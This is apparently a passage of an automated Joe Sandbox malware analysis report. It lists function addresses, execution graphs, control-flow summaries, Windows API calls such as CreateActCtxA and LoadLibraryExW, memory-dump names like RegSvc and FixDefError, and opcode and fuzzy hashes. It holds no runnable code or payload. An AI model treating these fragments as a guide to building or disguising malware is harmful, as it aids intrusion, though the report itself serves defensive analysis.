                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 623148B5E2420A8FCB49CF6CD8815AFFBB1BB91310F464567D421DB362D770A9428B93
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D7C0E Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5f30cdc992f1d4a41e99610f25d66481ac4914c54a28be1e4a06c3044ad8325a
                                                                                                                                                                                                                      • Instruction ID: d1ecd3b198b19b38634f5153bc1ae4c99a3472426f53d7f8469706ef402c0780
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f30cdc992f1d4a41e99610f25d66481ac4914c54a28be1e4a06c3044ad8325a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6210732B5441BCFC7AC8A34D9A872DB663A788748F194926E106DB2D8CB34DD41C781
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:13%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:15
                                                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                                                      execution_graph 11354 f777d0 11355 f777ff 11354->11355 11356 f77863 11355->11356 11358 f782d8 11355->11358 11359 f782fd 11358->11359 11363 f783d8 11359->11363 11367 f783c8 11359->11367 11365 f783ff 11363->11365 11364 f784dc 11364->11364 11365->11364 11371 f7773c 11365->11371 11369 f783d8 11367->11369 11368 f784dc 11368->11368 11369->11368 11370 f7773c CreateActCtxA 11369->11370 11370->11368 11372 f79868 CreateActCtxA 11371->11372 11374 f7992b 11372->11374

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 00F7773C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 604 f7773c-f79929 CreateActCtxA 607 f79932-f7998c 604->607 608 f7992b-f79931 604->608 615 f7998e-f79991 607->615 616 f7999b-f7999f 607->616 608->607 615->616 617 f799a1-f799ad 616->617 618 f799b0 616->618 617->618 619 f799b1 618->619 619->619
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 00F79919
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000001.00000002.301914048.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_f70000_ProgramStarter.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 5b2d77c7c40f03f29b634e7d38a9a8613baa8d95bda192f164517e8186593b6f
                                                                                                                                                                                                                      • Instruction ID: de9264e34ab086ce1358abc4391e6595ea5392f9383003e58c94324970a0572e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b2d77c7c40f03f29b634e7d38a9a8613baa8d95bda192f164517e8186593b6f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E41F271C00718CFDB24CFAAC984B8EBBB5BF48304F20805AD508AB255DBB55986CF91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00F7985E Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 621 f7985e-f79929 CreateActCtxA 623 f79932-f7998c 621->623 624 f7992b-f79931 621->624 631 f7998e-f79991 623->631 632 f7999b-f7999f 623->632 624->623 631->632 633 f799a1-f799ad 632->633 634 f799b0 632->634 633->634 635 f799b1 634->635 635->635
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 00F79919
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000001.00000002.301914048.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_f70000_ProgramStarter.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 663be2cab395c6b88eb252f664dd085bcac5784950b4adfb12a7984e87bae880
                                                                                                                                                                                                                      • Instruction ID: 8ccba989d2c0fb6f20999e05ab794a9f5a594a4d89d80357e5a5309d14f89bc6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 663be2cab395c6b88eb252f664dd085bcac5784950b4adfb12a7984e87bae880
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3841E2B1C00619CEDB24CFAAC984BDEFBF1BF48304F24815AD409AB255DBB55986CF91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:13.4%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:53
                                                                                                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                                                                                                      execution_graph 10977 24074e0 10978 240750b 10977->10978 10979 2407558 10978->10979 10983 2407b51 10978->10983 10991 2407b49 10978->10991 10999 2407b54 10978->10999 10984 2407b52 10983->10984 11007 2407c41 10984->11007 11011 2407c3c 10984->11011 11015 2407c38 10984->11015 11019 2407c48 10984->11019 11023 2407c45 10984->11023 10992 2407b52 10991->10992 10994 2407c41 CreateActCtxA 10992->10994 10995 2407c45 CreateActCtxA 10992->10995 10996 2407c48 CreateActCtxA 10992->10996 10997 2407c38 CreateActCtxA 10992->10997 10998 2407c3c CreateActCtxA 10992->10998 10993 2407b77 10993->10978 10994->10993 10995->10993 10996->10993 10997->10993 10998->10993 11000 2407b5a 10999->11000 11002 2407c41 CreateActCtxA 11000->11002 11003 2407c45 CreateActCtxA 11000->11003 11004 2407c48 CreateActCtxA 11000->11004 11005 2407c38 CreateActCtxA 11000->11005 11006 2407c3c CreateActCtxA 11000->11006 11001 2407b77 11001->10978 11002->11001 11003->11001 11004->11001 11005->11001 11006->11001 11008 2407c42 11007->11008 11009 2407d4c 11008->11009 11027 2407428 11008->11027 11009->11009 11013 2407c46 11011->11013 11012 2407d4c 11012->11012 11013->11012 11014 2407428 CreateActCtxA 11013->11014 11014->11012 11017 2407c42 11015->11017 11016 2407d4c 11016->11016 11017->11016 11018 2407428 CreateActCtxA 11017->11018 11018->11016 11021 2407c6f 11019->11021 11020 2407d4c 11021->11020 11022 2407428 CreateActCtxA 11021->11022 11022->11020 11024 2407c48 11023->11024 11025 2407428 CreateActCtxA 11024->11025 11026 2407d4c 11024->11026 11025->11026 11028 24090d8 CreateActCtxA 11027->11028 11030 240919b 11028->11030 11031 240eb10 11032 240eb52 11031->11032 11033 240eb58 GetModuleHandleW 11031->11033 11032->11033 11034 240eb85 11033->11034 11035 240ebb8 11036 240ebcc 11035->11036 11037 240ebf1 11036->11037 11039 240dce0 11036->11039 11040 240f198 LoadLibraryExW 11039->11040 11042 240f211 11040->11042 11042->11037

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 024090CC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 586 24090cc-24090d7 588 24090d8-2409199 CreateActCtxA 586->588 590 24091a2-24091fc 588->590 591 240919b-24091a1 588->591 598 240920b-240920f 590->598 599 24091fe-2409201 590->599 591->590 600 2409220 598->600 601 2409211-240921d 598->601 599->598 603 2409221 600->603 601->600 603->603
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02409189
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000038.00000002.520446522.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_56_2_2400000_RegSvc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 5d8ce1b739d0fcc5812305af49f86013c7fde5bcf6e558d962db81793bd428c8
                                                                                                                                                                                                                      • Instruction ID: ad74bde57091079cff3ff7ff118ed3ec30e11e3a556dce07e4a1312a7bd18f10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d8ce1b739d0fcc5812305af49f86013c7fde5bcf6e558d962db81793bd428c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B741F371D00719CFDB24CFA9C984BCEBBB6BF48304F24846AD409AB255DB755986CF90
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 024090D0 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 604 24090d0-24090d7 606 24090d8-2409199 CreateActCtxA 604->606 608 24091a2-24091fc 606->608 609 240919b-24091a1 606->609 616 240920b-240920f 608->616 617 24091fe-2409201 608->617 609->608 618 2409220 616->618 619 2409211-240921d 616->619 617->616 621 2409221 618->621 619->618 621->621
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02409189
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000038.00000002.520446522.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_56_2_2400000_RegSvc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 655c7bdcf658513f1fb5c2c447c6bd68484d7686152c89d5633e6ab49f33e235
                                                                                                                                                                                                                      • Instruction ID: 3c16f02b018d682d5158cbd9d19067438d6681e09a042abc828e8e3741bb7b25
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 655c7bdcf658513f1fb5c2c447c6bd68484d7686152c89d5633e6ab49f33e235
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A541F370D00719CFDB24CFA9C984BCEBBB5BF48304F24846AD409AB255DB759986CF90
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 02407428 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 622 2407428-2409199 CreateActCtxA 625 24091a2-24091fc 622->625 626 240919b-24091a1 622->626 633 240920b-240920f 625->633 634 24091fe-2409201 625->634 626->625 635 2409220 633->635 636 2409211-240921d 633->636 634->633 638 2409221 635->638 636->635 638->638
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02409189
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000038.00000002.520446522.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_56_2_2400000_RegSvc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 837ce2ce0773faaf0fc3cb091b01c6faf9d883308ac092f4bc8dc65867156c9e
                                                                                                                                                                                                                      • Instruction ID: 65e570a986ef54b9ab6f04ba42b4d4ad00f6c4b34d0d591e41753a207bb1e0d7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 837ce2ce0773faaf0fc3cb091b01c6faf9d883308ac092f4bc8dc65867156c9e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1241F3B0D00719CBDB24CF99C984B8EBBF1BF48304F24846AD409AB255DB715986CF90
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0240DCE0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 639 240dce0-240f1d8 641 240f1e0-240f20f LoadLibraryExW 639->641 642 240f1da-240f1dd 639->642 643 240f211-240f217 641->643 644 240f218-240f235 641->644 642->641 643->644
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0240EBF1,00000800,00000000,00000000), ref: 0240F202
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000038.00000002.520446522.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_56_2_2400000_RegSvc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                      • Opcode ID: 28dde8b87512d1d1ebe9640cd8f3e1c9bb14f759ba0058a5fbc30f315a470cb1
                                                                                                                                                                                                                      • Instruction ID: a9c42d3452a480d220eb9487b15744510de558f39abbcea2ea4cc6e0182f256e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28dde8b87512d1d1ebe9640cd8f3e1c9bb14f759ba0058a5fbc30f315a470cb1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27111AB69003098FCB20CF9AD484ADEFBF5EB58314F10842ED415A7640C775A985CFA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0240EB10 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 647 240eb10-240eb50 648 240eb52-240eb55 647->648 649 240eb58-240eb83 GetModuleHandleW 647->649 648->649 650 240eb85-240eb8b 649->650 651 240eb8c-240eba0 649->651 650->651
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0240EB76
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000038.00000002.520446522.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_56_2_2400000_RegSvc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                      • Opcode ID: 2a89b811d05268ef27b79a365e0f71d6418653e073a02de4ea866953ec321eb4
                                                                                                                                                                                                                      • Instruction ID: debc8cc494c7007a53dc6913714f086a27879df848453db4d5fe4dc0aa81ad19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a89b811d05268ef27b79a365e0f71d6418653e073a02de4ea866953ec321eb4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E1102B6D002498FDB10CF9AC984ADEFBF4AB48324F10842AD829B7600C375A585CFA1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%